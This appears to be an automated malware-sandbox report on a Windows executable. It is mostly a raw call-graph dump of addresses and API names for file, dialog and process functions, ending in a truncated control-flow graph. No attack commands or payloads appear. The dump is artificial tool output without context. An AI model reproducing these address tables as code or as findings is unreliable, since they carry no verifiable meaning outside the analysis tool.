7ff7390d96e8 std::_Xinvalid_argument 47 API calls 18803->18804 18805 7ff7390cb16c 18804->18805 18811 7ff7390d9920 _snwprintf 18810->18811 18812 7ff7390c3028 RemoveDirectoryW 18811->18812 18821 7ff7390c373a 18820->18821 18823 7ff7390c2c74 18821->18823 18841 7ff7390d0695 18840->18841 18843 7ff7390d069d 18840->18843 18843->17475 18940 7ff7390d9920 _snwprintf 18939->18940 18941 7ff7390c3144 GetFileAttributesW 18940->18941 18942 7ff7390c3169 18941->18942 18943 7ff7390c318d 18941->18943 18950 7ff7390c339a _snwprintf 18949->18950 18951 7ff7390c33da 18950->18951 18952 7ff7390c33cb CreateDirectoryW 18950->18952 18953 7ff7390c3134 11 API calls 18951->18953 18952->18951 18954 7ff7390c340f 18952->18954 18967 7ff7390d9af8 IsProcessorFeaturePresent 18964->18967 18968 7ff7390d9b0f 18967->18968 18978 7ff7390c9d59 18977->18978 18982 7ff7390d8227 18981->18982 18983 7ff7390d8220 18981->18983 18982->18983 18984 7ff7390d823a DialogBoxParamW 18982->18984 18983->17533 18985 7ff7390d82bb 18984->18985 18985->18983 21041 7ff7390d8cd8 21042 7ff7390d8c28 21041->21042 21043 7ff7390d9330 std::_Xinvalid_argument 14 API calls 21042->21043 21044 7ff7390d8c67 21043->21044 21044->21044 20340 7ff7390d8ed7 20341 7ff7390d9330 std::_Xinvalid_argument 14 API calls 20340->20341 20342 7ff7390d8f16 20341->20342 20342->20342 21571 7ff7390ed9d8 21572 7ff7390ed9f4 21571->21572 21573 7ff7390ed9ea 21571->21573 21575 7ff7390e6518 LeaveCriticalSection 21573->21575 18991 7ff7390d5700 18992 7ff7390d571f _snwprintf 18991->18992 19152 7ff7390c1230 18992->19152 18994 7ff7390d5759 18995 7ff7390d5771 18994->18995 18996 7ff7390d5f49 18994->18996 19068 7ff7390d5786 18994->19068 19001 7ff7390d57ec 18995->19001 19002 7ff7390d577d 18995->19002 18995->19068 19221 7ff7390d7adc 18996->19221 18997 7ff7390d98e0 _handle_error 8 API calls 18999 7ff7390d62da 18997->18999 19003 7ff7390d588d GetDlgItemTextW 19001->19003 19009 7ff7390d5806 19001->19009 19006 7ff7390d5781 19002->19006 19007 7ff7390d57c8 19002->19007 19003->19007 19008 7ff7390d58dc 19003->19008 19004 7ff7390d5f6b SendMessageW 19005 7ff7390d5f7c 19004->19005 19010 7ff7390d5fa3 GetDlgItem SendMessageW 19005->19010 19011 7ff7390d5f88 SendDlgItemMessageW 19005->19011 19012 7ff7390c6118 48 API calls 19006->19012 19006->19068 19015 7ff7390d58ce EndDialog 19007->19015 19007->19068 19013 7ff7390d58f3 GetDlgItem 19008->19013 19014 7ff7390d58e5 19008->19014 19016 7ff7390c6118 48 API calls 19009->19016 19241 7ff7390d3fac GetCurrentDirectoryW 19010->19241 19011->19010 19019 7ff7390d5797 19012->19019 19020 7ff7390d5911 SendMessageW SendMessageW 19013->19020 19021 7ff7390d593d SetFocus 19013->19021 19014->19007 19028 7ff7390d5e8c 19014->19028 19015->19068 19022 7ff7390d5824 SetDlgItemTextW 19016->19022 19018 7ff7390d5fdc GetDlgItem SetWindowTextW 19242 7ff7390d45f0 GetClassNameW 19018->19242 19257 7ff7390c1120 SHGetMalloc 19019->19257 19020->19021 19025 7ff7390d594f 19021->19025 19035 7ff7390d595e 19021->19035 19026 7ff7390d5832 19022->19026 19029 7ff7390c6118 48 API calls 19025->19029 19030 7ff7390d584c GetMessageW 19026->19030 19026->19068 19032 7ff7390c6118 48 API calls 19028->19032 19033 7ff7390d5959 19029->19033 19034 7ff7390d5866 IsDialogMessageW 19030->19034 19030->19068 19038 7ff7390d5e9d SetDlgItemTextW 19032->19038 19042 7ff7390d7858 24 API calls 19033->19042 19034->19026 19039 7ff7390d5877 TranslateMessage DispatchMessageW 19034->19039 19043 7ff7390c6118 48 API calls 19035->19043 19036 7ff7390d6039 19040 7ff7390d6057 19036->19040 19044 7ff7390d682c 141 API calls 19036->19044 19037 7ff7390d62bf SetDlgItemTextW 19037->19068 19041 7ff7390c6118 48 API calls 19038->19041 19039->19026 19045 7ff7390d6093 19040->19045 19048 7ff7390c6118 48 API calls 19040->19048 19078 7ff7390d5ecf 19041->19078 19046 7ff7390d59ad 19042->19046 19047 7ff7390d5987 19043->19047 19044->19040 19055 7ff7390d682c 141 API calls 19045->19055 19092 7ff7390d6179 19045->19092 19049 7ff7390d59c2 19046->19049 19261 7ff7390d8004 19046->19261 19051 7ff7390c3774 swprintf 46 API calls 19047->19051 19052 7ff7390d606a SetDlgItemTextW 19048->19052 19054 7ff7390d59e8 19049->19054 19061 7ff7390c3120 11 API calls 19049->19061 19050 7ff7390d6239 19058 7ff7390d6242 EnableWindow 19050->19058 19077 7ff7390d624d 19050->19077 19051->19033 19059 7ff7390c6118 48 API calls 19052->19059 19057 7ff7390c2ee4 20 API calls 19054->19057 19056 7ff7390d60b2 19055->19056 19067 7ff7390d60c7 19056->19067 19091 7ff7390d60f3 19056->19091 19064 7ff7390d59fd 19057->19064 19058->19077 19065 7ff7390d6085 SetDlgItemTextW 19059->19065 19060 7ff7390d5f25 19063 7ff7390c6118 48 API calls 19060->19063 19062 7ff7390d59d8 19061->19062 19062->19054 19066 7ff7390d59dc 19062->19066 19063->19068 19069 7ff7390d5a01 GetLastError 19064->19069 19070 7ff7390d5a12 19064->19070 19065->19045 19265 7ff7390d49c8 GetCurrentProcess 19066->19265 19291 7ff7390d36e8 ShowWindow 19067->19291 19068->18997 19069->19070 19160 7ff7390d467c SetCurrentDirectoryW 19070->19160 19071 7ff7390d615b 19074 7ff7390d682c 141 API calls 19071->19074 19072 7ff7390d62a1 19072->19068 19081 7ff7390c6118 48 API calls 19072->19081 19074->19092 19077->19072 19083 7ff7390d6299 SendMessageW 19077->19083 19078->19060 19079 7ff7390c6118 48 API calls 19078->19079 19084 7ff7390d5f08 19079->19084 19080 7ff7390d60e7 19080->19091 19086 7ff7390d57af 19081->19086 19082 7ff7390d5a1e 19087 7ff7390d5a34 19082->19087 19088 7ff7390d5a25 GetLastError 19082->19088 19083->19072 19089 7ff7390c3774 swprintf 46 API calls 19084->19089 19085 7ff7390d6212 19090 7ff7390d36e8 37 API calls 19085->19090 19086->19037 19086->19068 19093 7ff7390d5ab3 19087->19093 19095 7ff7390d5a43 GetTickCount 19087->19095 19131 7ff7390d5aa4 19087->19131 19088->19087 19089->19060 19090->19050 19091->19071 19094 7ff7390d682c 141 API calls 19091->19094 19092->19050 19092->19085 19096 7ff7390c6118 48 API calls 19092->19096 19097 7ff7390d5ccb 19093->19097 19098 7ff7390d5cc2 19093->19098 19099 7ff7390d5ac9 GetModuleFileNameW 19093->19099 19100 7ff7390d612a 19094->19100 19101 7ff7390c3774 swprintf 46 API calls 19095->19101 19096->19092 19104 7ff7390c6118 48 API calls 19097->19104 19098->19007 19098->19097 19102 7ff7390c6ff8 78 API calls 19099->19102 19100->19071 19103 7ff7390d6133 DialogBoxParamW 19100->19103 19105 7ff7390d5a5f 19101->19105 19108 7ff7390d5af1 19102->19108 19103->19071 19106 7ff7390d5cd5 19104->19106 19111 7ff7390c2138 11 API calls 19105->19111 19109 7ff7390c3774 swprintf 46 API calls 19106->19109 19107 7ff7390d5d34 19112 7ff7390c6118 48 API calls 19107->19112 19110 7ff7390c3774 swprintf 46 API calls 19108->19110 19115 7ff7390d5cf9 19109->19115 19113 7ff7390d5b1c CreateFileMappingW 19110->19113 19116 7ff7390d5a82 19111->19116 19117 7ff7390d5d62 SetDlgItemTextW 19112->19117 19114 7ff7390d5b9a GetCommandLineW 19113->19114 19149 7ff7390d5c38 BuildCatchObjectHelperInternal 19113->19149 19119 7ff7390d5bac 19114->19119 19125 7ff7390c6118 48 API calls 19115->19125 19120 7ff7390d5a98 19116->19120 19121 7ff7390d5a89 GetLastError 19116->19121 19118 7ff7390c1208 19117->19118 19123 7ff7390d5d80 SetDlgItemTextW GetDlgItem 19118->19123 19275 7ff7390d51f0 SHGetMalloc 19119->19275 19161 7ff7390c2054 19120->19161 19121->19120 19122 7ff7390d5c3f ShellExecuteExW 19141 7ff7390d5c5d 19122->19141 19127 7ff7390d5dd1 19123->19127 19128 7ff7390d5dab GetWindowLongPtrW SetWindowLongPtrW 19123->19128 19130 7ff7390d5d11 19125->19130 19168 7ff7390d682c 19127->19168 19128->19127 19129 7ff7390d5bd2 19133 7ff7390d51f0 SHGetMalloc 19129->19133 19131->19093 19131->19107 19135 7ff7390d5be3 19133->19135 19138 7ff7390d51f0 SHGetMalloc 19135->19138 19136 7ff7390d5c9b 19136->19098 19144 7ff7390d5cb0 UnmapViewOfFile CloseHandle 19136->19144 19137 7ff7390d682c 141 API calls 19139 7ff7390d5dfb 19137->19139 19140 7ff7390d5bf4 19138->19140 19213 7ff7390d7f68 19139->19213 19277 7ff7390c7098 19140->19277 19141->19136 19147 7ff7390d5c89 Sleep 19141->19147 19144->19098 19147->19136 19147->19141 19149->19122 19153 7ff7390c12a4 19152->19153 19154 7ff7390c123e 19152->19154 19153->18994 19154->19153 19308 7ff7390c5d20 19154->19308 19156 7ff7390c1263 19156->19153 19157 7ff7390c1278 GetDlgItem 19156->19157 19157->19153 19158 7ff7390c128b 19157->19158 19158->19153 19159 7ff7390c1292 SetWindowTextW 19158->19159 19159->19153 19160->19082 19162 7ff7390c207a 19161->19162 19163 7ff7390c2069 19161->19163 19162->19131 19163->19162 19164 7ff7390c2075 19163->19164 19165 7ff7390c207c 19163->19165 19347 7ff7390c2264 19164->19347 19167 7ff7390c20d0 72 API calls 19165->19167 19167->19162 19169 7ff7390d5de6 19168->19169 19170 7ff7390d6835 _snwprintf 19168->19170 19169->19137 19358 7ff7390d50d4 19170->19358 19172 7ff7390d775b 19173 7ff7390d98e0 _handle_error 8 API calls 19172->19173 19173->19169 19174 7ff7390d706a GetTempPathW 19187 7ff7390d68ae wcscat 19174->19187 19175 7ff7390d50d4 9 API calls 19175->19187 19177 7ff7390d526c 72 API calls 19177->19187 19179 7ff7390d6d89 SetWindowTextW 19179->19187 19180 7ff7390c3774 swprintf 46 API calls 19180->19187 19181 7ff7390e2c80 43 API calls 19181->19187 19182 7ff7390c475c 8 API calls 19182->19187 19184 7ff7390c3120 11 API calls 19184->19187 19185 7ff7390d70d7 SetDlgItemTextW 19185->19187 19187->19172 19187->19174 19187->19175 19187->19177 19187->19179 19187->19180 19187->19181 19187->19182 19187->19184 19187->19185 19191 7ff7390c9878 CompareStringW 19187->19191 19195 7ff7390c3ff0 11 API calls 19187->19195 19197 7ff7390d71e8 EndDialog 19187->19197 19199 7ff7390d51f0 SHGetMalloc 19187->19199 19200 7ff7390d778a 19187->19200 19202 7ff7390d7785 19187->19202 19208 7ff7390c3134 11 API calls 19187->19208 19210 7ff7390d6d63 SendMessageW 19187->19210 19211 7ff7390d6eeb memcpy_s 19187->19211 19212 7ff7390c2ee4 20 API calls 19187->19212 19364 7ff7390d4ec0 19187->19364 19383 7ff7390d7c34 19187->19383 19407 7ff7390d3fac GetCurrentDirectoryW 19187->19407 19408 7ff7390c3874 19187->19408 19416 7ff7390c37e0 19187->19416 19419 7ff7390e2884 19187->19419 19188 7ff7390d6ef4 SetFileAttributesW 19190 7ff7390d6fb0 GetFileAttributesW 19188->19190 19188->19211 19193 7ff7390d6fbe DeleteFileW 19190->19193 19190->19211 19191->19187 19193->19211 19194 7ff7390c3874 14 API calls 19194->19211 19195->19187 19196 7ff7390c3774 swprintf 46 API calls 19201 7ff7390d6ff6 GetFileAttributesW 19196->19201 19197->19187 19199->19187 19205 7ff7390d9ae4 8 API calls 19200->19205 19206 7ff7390d7007 MoveFileW 19201->19206 19201->19211 19203 7ff7390d9ae4 8 API calls 19202->19203 19203->19200 19204 7ff7390d6d17 GetDlgItem SetWindowTextW SendMessageW 19204->19187 19209 7ff7390d7790 19205->19209 19207 7ff7390d701c MoveFileExW 19206->19207 19206->19211 19207->19211 19208->19187 19210->19187 19211->19187 19211->19188 19211->19190 19211->19194 19211->19196 19412 7ff7390c4398 19211->19412 19212->19187 19214 7ff7390d7f88 wcscpy 19213->19214 19453 7ff7390c8260 19214->19453 19216 7ff7390d7f9b wcscpy 19457 7ff7390c13bc 19216->19457 19218 7ff7390d7fb9 19461 7ff7390d1eb0 19218->19461 19222 7ff7390d7af4 _snwprintf 19221->19222 19674 7ff7390d3f0c 19222->19674 19225 7ff7390d7c09 19227 7ff7390d98e0 _handle_error 8 API calls 19225->19227 19226 7ff7390d7b19 GetWindow 19234 7ff7390d7b34 19226->19234 19228 7ff7390d5f51 19227->19228 19228->19004 19228->19005 19229 7ff7390d7b40 GetClassNameW 19679 7ff7390c9878 CompareStringW 19229->19679 19231 7ff7390d7be8 GetWindow 19231->19225 19231->19234 19232 7ff7390d7b69 GetWindowLongPtrW 19232->19231 19233 7ff7390d7b7b SendMessageW 19232->19233 19233->19231 19235 7ff7390d7b97 GetObjectW 19233->19235 19234->19225 19234->19229 19234->19231 19234->19232 19680 7ff7390d3f74 19235->19680 19237 7ff7390d7bb3 19684 7ff7390d3f3c 19237->19684 19688 7ff7390d41fc 19237->19688 19241->19018 19243 7ff7390d4623 19242->19243 19244 7ff7390d4650 19242->19244 19708 7ff7390c9878 CompareStringW 19243->19708 19246 7ff7390d4663 19244->19246 19247 7ff7390d4655 SHAutoComplete 19244->19247 19249 7ff7390d98e0 _handle_error 8 API calls 19246->19249 19247->19246 19248 7ff7390d4634 19248->19244 19250 7ff7390d4638 FindWindowExW 19248->19250 19251 7ff7390d4673 19249->19251 19250->19244 19252 7ff7390d2470 19251->19252 19709 7ff7390d23ec 19252->19709 19254 7ff7390d24a7 19255 7ff7390c9404 MultiByteToWideChar 19254->19255 19256 7ff7390d24e8 19254->19256 19255->19256 19256->19036 19258 7ff7390c1155 19257->19258 19259 7ff7390d98e0 _handle_error 8 API calls 19258->19259 19260 7ff7390c11d2 19259->19260 19260->19086 19264 7ff7390d8014 _snwprintf 19261->19264 19262 7ff7390d98e0 _handle_error 8 API calls 19263 7ff7390d80ec 19262->19263 19263->19049 19264->19262 19266 7ff7390d4a0d 19265->19266 19267 7ff7390d4a7f 19266->19267 19270 7ff7390d4a40 GetLastError 19266->19270 19272 7ff7390d4a4f 19266->19272 19268 7ff7390d98e0 _handle_error 8 API calls 19267->19268 19269 7ff7390d4b60 19268->19269 19269->19054 19270->19267 19270->19272 19271 7ff7390d4b44 19271->19267 19273 7ff7390d4b4e LocalFree 19271->19273 19272->19267 19272->19271 19274 7ff7390d4b20 CreateDirectoryW 19272->19274 19273->19267 19274->19271 19276 7ff7390d5224 19275->19276 19276->19129 19278 7ff7390c70cc 19277->19278 19282 7ff7390c7120 19277->19282 19279 7ff7390c8438 10 API calls 19278->19279 19278->19282 19281 7ff7390c70e0 19279->19281 19280 7ff7390c71ae GetCurrentProcessId 19284 7ff7390c718f MapViewOfFile 19280->19284 19281->19282 19283 7ff7390c70ec GetProcAddress GetProcAddress 19281->19283 19282->19280 19285 7ff7390c7152 19282->19285 19283->19282 19284->19149 19285->19284 19286 7ff7390c1b88 71 API calls 19285->19286 19287 7ff7390c717a 19286->19287 19288 7ff7390c1e30 71 API calls 19287->19288 19289 7ff7390c7182 19288->19289 19290 7ff7390c1b80 2 API calls 19289->19290 19290->19284 19292 7ff7390d373d 19291->19292 19293 7ff7390d3750 19292->19293 19294 7ff7390e2884 31 API calls 19292->19294 19295 7ff7390d3765 19293->19295 19297 7ff7390e2884 31 API calls 19293->19297 19294->19293 19296 7ff7390d3771 GetWindowRect 19295->19296 19299 7ff7390d378c 19296->19299 19297->19296 19298 7ff7390d3871 19300 7ff7390d3876 ShowWindow 19298->19300 19301 7ff7390d386f 19298->19301 19299->19298 19304 7ff7390d3828 19299->19304 19300->19301 19302 7ff7390d98e0 _handle_error 8 API calls 19301->19302 19303 7ff7390d389b 19302->19303 19303->19080 19304->19301 19731 7ff7390d34d0 19304->19731 19307 7ff7390d384d ShowWindow SetWindowTextW 19307->19301 19309 7ff7390c3774 swprintf 46 API calls 19308->19309 19310 7ff7390c5d7d 19309->19310 19311 7ff7390c96d0 WideCharToMultiByte 19310->19311 19312 7ff7390c5d8d 19311->19312 19313 7ff7390c5dfd 19312->19313 19327 7ff7390c51f0 31 API calls 19312->19327 19330 7ff7390c5dde SetDlgItemTextW 19312->19330 19333 7ff7390c4f18 19313->19333 19316 7ff7390c5f66 GetSystemMetrics GetWindow 19320 7ff7390c6095 19316->19320 19331 7ff7390c5f91 19316->19331 19317 7ff7390c5e77 19318 7ff7390c5e80 GetWindowLongPtrW 19317->19318 19319 7ff7390c5f36 19317->19319 19322 7ff739138288 19318->19322 19338 7ff7390c4fc4 19319->19338 19321 7ff7390d98e0 _handle_error 8 API calls 19320->19321 19324 7ff7390c60a4 19321->19324 19325 7ff7390c5f1e GetWindowRect 19322->19325 19324->19156 19325->19319 19327->19312 19328 7ff7390c5fb2 GetWindowRect 19328->19331 19329 7ff7390c5f59 SetWindowTextW 19329->19316 19330->19312 19331->19320 19331->19328 19332 7ff7390c6074 GetWindow 19331->19332 19332->19320 19332->19331 19334 7ff7390c4fc4 47 API calls 19333->19334 19337 7ff7390c4f57 19334->19337 19335 7ff7390d98e0 _handle_error 8 API calls 19336 7ff7390c4fb4 GetWindowRect GetClientRect 19335->19336 19336->19316 19336->19317 19337->19335 19339 7ff7390c3774 swprintf 46 API calls 19338->19339 19340 7ff7390c5007 19339->19340 19341 7ff7390c96d0 WideCharToMultiByte 19340->19341 19342 7ff7390c501f 19341->19342 19343 7ff7390c51f0 31 API calls 19342->19343 19344 7ff7390c5037 19343->19344 19345 7ff7390d98e0 _handle_error 8 API calls 19344->19345 19346 7ff7390c5047 19345->19346 19346->19316 19346->19329 19348 7ff7390c229b 19347->19348 19349 7ff7390c2273 _snwprintf 19347->19349 19348->19162 19349->19348 19350 7ff7390c30ac DeleteFileW 19349->19350 19351 7ff7390c30d3 19350->19351 19352 7ff7390c30fa 19350->19352 19353 7ff7390c44c8 9 API calls 19351->19353 19354 7ff7390d98e0 _handle_error 8 API calls 19352->19354 19355 7ff7390c30e6 19353->19355 19356 7ff7390c310c 19354->19356 19355->19352 19357 7ff7390c30ea DeleteFileW 19355->19357 19356->19162 19357->19352 19361 7ff7390d50e5 _snwprintf 19358->19361 19359 7ff7390d98e0 _handle_error 8 API calls 19360 7ff7390d51e2 19359->19360 19360->19187 19362 7ff7390d51a3 ExpandEnvironmentStringsW 19361->19362 19363 7ff7390d51c7 19361->19363 19362->19363 19363->19359 19367 7ff7390d4eda _snwprintf 19364->19367 19365 7ff7390d98e0 _handle_error 8 API calls 19366 7ff7390d4fc8 19365->19366 19366->19204 19368 7ff7390d4fdb 19367->19368 19369 7ff7390d4f99 19367->19369 19370 7ff7390d9ae4 8 API calls 19368->19370 19369->19365 19371 7ff7390d4fe0 19370->19371 19372 7ff7390c1230 59 API calls 19371->19372 19373 7ff7390d5035 19372->19373 19374 7ff7390d5051 19373->19374 19375 7ff7390d50a1 SetDlgItemTextW 19373->19375 19376 7ff7390d5041 19373->19376 19377 7ff7390d98e0 _handle_error 8 API calls 19374->19377 19375->19374 19376->19374 19378 7ff7390d5062 GetDlgItemTextW 19376->19378 19379 7ff7390d504d 19376->19379 19380 7ff7390d50c7 19377->19380 19381 7ff7390c71e4 78 API calls 19378->19381 19379->19374 19382 7ff7390d5057 EndDialog 19379->19382 19380->19204 19381->19379 19382->19374 19387 7ff7390d7c52 memcpy_s _snwprintf 19383->19387 19384 7ff7390d7ec2 19385 7ff7390d98e0 _handle_error 8 API calls 19384->19385 19386 7ff7390d7ed1 19385->19386 19386->19187 19387->19384 19388 7ff7390d7d7e 19387->19388 19426 7ff7390c9878 CompareStringW 19387->19426 19389 7ff7390c3120 11 API calls 19388->19389 19391 7ff7390d7d9c 19389->19391 19392 7ff7390d7dbd ShellExecuteExW 19391->19392 19427 7ff7390c3ff0 19391->19427 19392->19384 19395 7ff7390d7dd0 19392->19395 19396 7ff7390d7e0a 19395->19396 19397 7ff7390d7e5f CloseHandle 19395->19397 19402 7ff7390d7dfc ShowWindow 19395->19402 19437 7ff7390d8190 19396->19437 19398 7ff7390d7e7d 19397->19398 19399 7ff7390d7e6e 19397->19399 19398->19384 19404 7ff7390d7eb4 ShowWindow 19398->19404 19443 7ff7390c9878 CompareStringW 19399->19443 19402->19396 19403 7ff7390d7e22 19403->19397 19405 7ff7390d7e30 GetExitCodeProcess 19403->19405 19404->19384 19405->19397 19406 7ff7390d7e43 19405->19406 19406->19397 19407->19187 19411 7ff7390c389a 19408->19411 19409 7ff7390c3942 19409->19187 19410 7ff7390c3984 14 API calls 19410->19411 19411->19409 19411->19410 19413 7ff7390c43c6 19412->19413 19414 7ff7390c3774 swprintf 46 API calls 19413->19414 19415 7ff7390c43e2 19413->19415 19414->19415 19415->19211 19417 7ff7390c37f1 FindClose 19416->19417 19418 7ff7390c37f7 19416->19418 19417->19418 19418->19187 19420 7ff7390e28a2 19419->19420 19421 7ff7390e28b9 19419->19421 19420->19187 19421->19420 19444 7ff7390e5fc8 19421->19444 19424 7ff7390dea50 _invalid_parameter_noinfo_noreturn 16 API calls 19425 7ff7390e2905 19424->19425 19426->19388 19428 7ff7390c4001 _snwprintf 19427->19428 19429 7ff7390c4090 19428->19429 19430 7ff7390c4035 GetFullPathNameW 19428->19430 19431 7ff7390d98e0 _handle_error 8 API calls 19429->19431 19430->19429 19432 7ff7390c4057 19430->19432 19433 7ff7390c40d1 19431->19433 19434 7ff7390c44c8 9 API calls 19432->19434 19433->19392 19435 7ff7390c406d 19434->19435 19435->19429 19436 7ff7390c4071 GetFullPathNameW 19435->19436 19436->19429 19438 7ff7390d81e3 WaitForSingleObject 19437->19438 19439 7ff7390d81f5 19438->19439 19440 7ff7390d819b PeekMessageW 19438->19440 19439->19403 19441 7ff7390d81e0 19440->19441 19442 7ff7390d81b7 GetMessageW TranslateMessage DispatchMessageW 19440->19442 19441->19438 19442->19441 19443->19398 19445 7ff7390e5fd5 19444->19445 19446 7ff7390e5fdf 19444->19446 19445->19446 19448 7ff7390e5ffb 19445->19448 19447 7ff7390e4850 _set_fmode 15 API calls 19446->19447 19452 7ff7390e5fe7 19447->19452 19450 7ff7390e28e8 19448->19450 19451 7ff7390e4850 _set_fmode 15 API calls 19448->19451 19449 7ff7390dea00 _invalid_parameter_noinfo 31 API calls 19449->19450 19450->19420 19450->19424 19451->19452 19452->19449 19454 7ff7390c828c 19453->19454 19475 7ff7390c81bc 19454->19475 19456 7ff7390c8298 wcscpy 19456->19216 19458 7ff7390c8260 19457->19458 19459 7ff7390c81bc 73 API calls 19458->19459 19460 7ff7390c8298 wcscpy 19459->19460 19460->19218 19462 7ff7390d1ebc memcpy_s _snwprintf 19461->19462 19488 7ff7390c6e6c 19462->19488 19464 7ff7390d1f48 memcpy_s 19491 7ff7390d1980 19464->19491 19466 7ff7390d1fa4 19495 7ff7390c6f64 19466->19495 19468 7ff7390d1fb2 19476 7ff7390c81df 19475->19476 19480 7ff7390c8249 19475->19480 19477 7ff7390c820c 19476->19477 19478 7ff7390c1b88 71 API calls 19476->19478 19477->19480 19482 7ff7390c1c6c 71 API calls 19477->19482 19479 7ff7390c8200 19478->19479 19483 7ff7390c1c6c 19479->19483 19480->19456 19482->19480 19484 7ff7390c1ca4 69 API calls 19483->19484 19485 7ff7390c1c7a 19484->19485 19486 7ff7390db514 std::_Xinvalid_argument 2 API calls 19485->19486 19487 7ff7390c1ca0 19486->19487 19524 7ff7390c6dcc 19488->19524 19490 7ff7390c6e8c 19490->19464 19492 7ff7390d1a01 BuildCatchObjectHelperInternal 19491->19492 19492->19492 19493 7ff7390d0658 47 API calls 19492->19493 19494 7ff7390d1cad 19492->19494 19493->19494 19494->19466 19494->19494 19496 7ff7390c6f72 19495->19496 19497 7ff7390c6fa5 19496->19497 19498 7ff7390dea20 _invalid_parameter_noinfo_noreturn 31 API calls 19496->19498 19497->19468 19499 7ff7390c6fc6 19498->19499 19525 7ff7390c6dd5 19524->19525 19538 7ff7390c6e55 19524->19538 19526 7ff7390c6df6 19525->19526 19527 7ff7390c6e65 19525->19527 19529 7ff7390c6e10 19526->19529 19530 7ff7390c6e03 19526->19530 19528 7ff7390c7254 47 API calls 19527->19528 19531 7ff7390c6e6a 19528->19531 19533 7ff7390d999c 4 API calls 19529->19533 19535 7ff7390c6e0b memcpy_s 19529->19535 19532 7ff7390c2c38 47 API calls 19530->19532 19534 7ff7390c6dcc 47 API calls 19531->19534 19532->19535 19533->19535 19536 7ff7390c6e8c 19534->19536 19539 7ff7390c6ea0 19535->19539 19536->19490 19538->19490 19540 7ff7390c6ee1 19539->19540 19541 7ff7390c6eae 19539->19541 19540->19538 19541->19540 19542 7ff7390dea20 _invalid_parameter_noinfo_noreturn 31 API calls 19541->19542 19544 7ff7390c6f02 19542->19544 19543 7ff7390c6f40 19543->19538 19544->19543 19545 7ff7390dea20 _invalid_parameter_noinfo_noreturn 31 API calls 19544->19545 19546 7ff7390c6f61 19545->19546 19675 7ff7390d3f3c 4 API calls 19674->19675 19676 7ff7390d3f1a 19675->19676 19677 7ff7390d3f29 19676->19677 19678 7ff7390d3f74 4 API calls 19676->19678 19677->19225 19677->19226 19678->19677 19679->19234 19681 7ff7390d3f86 19680->19681 19682 7ff7390d3f8b 19680->19682 19699 7ff7390d3fc8 GetDC 19681->19699 19682->19237 19685 7ff7390d3f4e 19684->19685 19686 7ff7390d3f53 19684->19686 19687 7ff7390d3fc8 4 API calls 19685->19687 19686->19237 19687->19686 19702 7ff7390d4018 GetDC GetDeviceCaps ReleaseDC 19688->19702 19690 7ff7390d422e 19691 7ff7390d4247 GetObjectW 19690->19691 19692 7ff7390d4238 19690->19692 19696 7ff7390d426a 19691->19696 19703 7ff7390d44b8 GetDC 19692->19703 19694 7ff7390d98e0 _handle_error 8 API calls 19695 7ff7390d44a6 SendMessageW DeleteObject 19694->19695 19695->19231 19697 7ff7390d4242 19696->19697 19698 7ff7390d4441 DeleteObject 19696->19698 19697->19694 19698->19697 19700 7ff7390d4011 19699->19700 19701 7ff7390d3fde GetDeviceCaps GetDeviceCaps ReleaseDC 19699->19701 19700->19682 19701->19700 19702->19690 19704 7ff7390d44f3 19703->19704 19705 7ff7390d44ff GetObjectW 19704->19705 19706 7ff7390d4536 19705->19706 19707 7ff7390d45be ReleaseDC 19706->19707 19707->19697 19708->19248 19710 7ff7390d23fa _snwprintf 19709->19710 19711 7ff7390c2420 14 API calls 19710->19711 19712 7ff7390d2433 19711->19712 19713 7ff7390d2447 19712->19713 19719 7ff7390d229c 19712->19719 19715 7ff7390c2054 75 API calls 19713->19715 19716 7ff7390d2452 19715->19716 19717 7ff7390d98e0 _handle_error 8 API calls 19716->19717 19718 7ff7390d2462 19717->19718 19718->19254 19720 7ff7390d22cd 19719->19720 19721 7ff7390d23a3 BuildCatchObjectHelperInternal 19720->19721 19722 7ff7390d2184 82 API calls 19720->19722 19721->19713 19723 7ff7390d22e4 19722->19723 19724 7ff7390c236c 77 API calls 19723->19724 19725 7ff7390d22ee 19724->19725 19730 7ff7390c2900 77 API calls 19725->19730 19726 7ff7390d2312 19729 7ff7390c2740 78 API calls 19726->19729 19727 7ff7390d2328 19727->19721 19728 7ff7390c1990 69 API calls 19727->19728 19728->19721 19729->19727 19730->19726 19734 7ff7390d34fb 19731->19734 19732 7ff7390d3697 19732->19301 19732->19307 19733 7ff7390c98a8 CompareStringW 19733->19734 19734->19732 19734->19733 20332 7ff7390e2ff8 20333 7ff7390e4060 __GSHandlerCheck_EH 35 API calls 20332->20333 20334 7ff7390e2ffd 20333->20334 20339 7ff7390e6518 LeaveCriticalSection 20334->20339

                                                                                                            Executed Functions

                                                                                                            Function 00007FF7390C84B0 Relevance: 154.4, APIs: 22, Strings: 66, Instructions: 380libraryfileloaderCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 7ff7390c84b0-7ff7390c8504 call 7ff7390d9920 GetModuleHandleW 3 7ff7390c8506-7ff7390c8519 GetProcAddress 0->3 4 7ff7390c855b-7ff7390c8854 0->4 7 7ff7390c8533-7ff7390c8546 GetProcAddress 3->7 8 7ff7390c851b-7ff7390c852a 3->8 5 7ff7390c894e-7ff7390c8986 GetModuleFileNameW call 7ff7390c48d0 call 7ff7390c8168 4->5 6 7ff7390c885a-7ff7390c8863 call 7ff7390e27fc 4->6 20 7ff7390c8989-7ff7390c8993 call 7ff7390c3b10 5->20 6->5 15 7ff7390c8869-7ff7390c88ad GetModuleFileNameW CreateFileW 6->15 7->4 11 7ff7390c8548-7ff7390c8558 7->11 8->7 11->4 18 7ff7390c88b3-7ff7390c88c6 SetFilePointer 15->18 19 7ff7390c8945-7ff7390c8948 CloseHandle 15->19 18->19 21 7ff7390c88c8-7ff7390c88ea ReadFile 18->21 19->5 27 7ff7390c8995-7ff7390c89a0 call 7ff7390c8438 20->27 28 7ff7390c89c8-7ff7390c89f0 call 7ff7390c49d8 GetFileAttributesW 20->28 21->19 23 7ff7390c88ec-7ff7390c88fa 21->23 25 7ff7390c8900-7ff7390c8916 23->25 26 7ff7390c8bae-7ff7390c8bc4 call 7ff7390d9ae4 call 7ff7390c93dc call 7ff7390c93e4 23->26 29 7ff7390c8927-7ff7390c893c call 7ff7390c7e24 25->29 58 7ff7390c8bc6-7ff7390c8bd2 call 7ff7390c1b80 26->58 59 7ff7390c8bd7-7ff7390c8bde 26->59 27->28 39 7ff7390c89a2-7ff7390c89c6 CompareStringW 27->39 43 7ff7390c8a06 28->43 44 7ff7390c89f2 28->44 41 7ff7390c893e 29->41 42 7ff7390c8918-7ff7390c8924 call 7ff7390c8438 29->42 39->28 